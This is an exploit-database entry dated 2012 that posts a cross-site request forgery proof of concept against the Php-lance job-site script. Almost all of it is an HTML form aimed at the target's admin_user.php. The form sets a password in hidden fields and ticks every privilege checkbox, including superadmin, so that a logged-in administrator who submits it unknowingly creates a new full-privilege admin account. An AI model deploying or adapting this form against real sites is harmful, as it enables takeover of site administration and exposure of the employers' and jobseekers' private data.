Php-lance CSRF (add admin) Vulnerability

2012-03-13T00:00:00
ID 1337DAY-ID-17695
Type zdt
Reporter Jonturk75
Modified 2012-03-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Php-lance CSRF (add admin)
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/phplance/14884/
# Category::  webapps
# Demo : http://www.scriptdemo.com/php-jobsite/demo/admin/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com


<form onsubmit="return check_form();" name="adminuser" action="http://www.target.com/[PATH]/admin_user.php" method="post">
<input type="hidden" size="15" value="" name="admin name" class="itext"/></td>
<input type="hidden" size="15" value="password" name="au_pwd" class="itext"/></td>
<input type="hidden" size="15" value="password" name="confau_pwd" class="itext"/></td>
<td nowrap="nowrap"><input type="checkbox" class="radio" value="superadmin" id="id_acc0" name="access[]"/><label for="id_acc0"> Super Admin - has all 

privileges</label></td></tr>
                                                              <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="bulk_admin" id="id_acc1" name="access

[]"/><label for="id_acc1"> Bulk Email</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="db_admin" id="id_acc2" name="access[]"/><label 

for="id_acc2"> Backup/Restore/Update/Export Database</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="user_admin" id="id_acc3" name="access[]"/><label 

for="id_acc3"> Edit/Add/Modify Admin Users(except Superadmin user)</label></td></tr>

                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="fee_admin" id="id_acc4" name="access[]"/><label 

for="id_acc4"> Edit/Add/Modify Plans with Planning Manager</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="cross_admin" id="id_acc5" name="access

[]"/><label for="id_acc5"> Edit/Modify/Save Cross Network Options</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="engine_admin" id="id_acc6" name="access

[]"/><label for="id_acc6"> Edit/Modify/Save Search Engine Options</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="comp_admin" id="id_acc7" name="access[]"/><label 

for="id_acc7"> Edit/Add/Modify/Search Employers/Companies</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="acomp_admin" id="id_acc8" name="access

[]"/><label for="id_acc8"> Edit/Modify/Search Archived Employers/Companies</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="job_admin" id="id_acc9" name="access[]"/><label 

for="id_acc9"> Edit/Add/Modify/Search Jobs</label></td></tr>

                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="ajob_admin" id="id_acc10" name="access

[]"/><label for="id_acc10"> Edit/Modify/Search Archived Jobs</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="pers_admin" id="id_acc11" name="access

[]"/><label for="id_acc11"> Edit/Add/Modify/Search Jobseekers</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="apers_admin" id="id_acc12" name="access

[]"/><label for="id_acc12"> Edit/Modify/Search Archived Jobseekers</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="res_admin" id="id_acc13" name="access[]"/><label 

for="id_acc13"> Edit/Add/Modify/Search Resumes</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="ares_admin" id="id_acc14" name="access

[]"/><label for="id_acc14"> Edit/Modify/Search Archived Resumes</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="setting_admin" id="id_acc15" name="access

[]"/><label for="id_acc15"> Edit/Modify/Save Script Settings + Payment Settings</label></td></tr>

                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="lng_admin" id="id_acc16" name="access[]"/><label 

for="id_acc16"> Edit/Modify/Update Language Text, Email Messages and Html Files</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="upgrade_admin" id="id_acc17" name="access

[]"/><label for="id_acc17"> Edit/Validate/View Upgrades and Additional Purchase</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="search_comp" id="id_acc18" name="access

[]"/><label for="id_acc18"> Search Employers/View Employer Information</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="search_job" id="id_acc19" name="access

[]"/><label for="id_acc19"> Search Jobs/View Job Information</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="search_jobapply" id="id_acc20" name="access

[]"/><label for="id_acc20"> Search Job Applies/View Job Applies</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="search_pers" id="id_acc21" name="access

[]"/><label for="id_acc21"> Search Jobseekers/View Jobseeker Information</label></td></tr>

                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="search_compprivate" id="id_acc22" name="access

[]"/><label for="id_acc22"> Search Received/Sent Employers Private Message/View Employers Private Messages</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="search_persprivate" id="id_acc23" name="access

[]"/><label for="id_acc23"> Search Received/Sent Jobseekers Private Message/View Jobseekers Private Messages</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="search_res" id="id_acc24" name="access

[]"/><label for="id_acc24"> Search Resumes/View Resume Information</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="invoice_admin" id="id_acc25" name="access

[]"/><label for="id_acc25"> View/Delete/Search Invoices</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="stat_admin" id="id_acc26" name="access

[]"/><label for="id_acc26"> View Admin Statistics</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="log_admin" id="id_acc27" name="access[]"/><label 

for="id_acc27"> View Log file and Mail Log</label></td></tr>

                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="cron_admin" id="id_acc28" name="access

[]"/><label for="id_acc28"> View/Send Cron Jobs</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="skin_admin" id="id_acc29" name="access

[]"/><label for="id_acc29"> Edit/Modify/Create/Delete Skins and the skin html files, images, layout options</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="news_admin" id="id_acc30" name="access

[]"/><label for="id_acc30"> View/Edit/Add News & Events</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="article_admin" id="id_acc31" name="access

[]"/><label for="id_acc31"> View/Edit/Add Articles & Resources</label></td></tr>
                                                             <tr><td nowrap="nowrap"><input type="checkbox" class="radio" value="testimonial_admin" id="id_acc32" name="access

[]"/><label for="id_acc32"> View/Edit/Add Testimonials</label></td></tr>

          
<td align="center" colspan="2"><input type="submit" value="Add Admin User" name="save" 
</form>



#  0day.today [2018-04-14]  #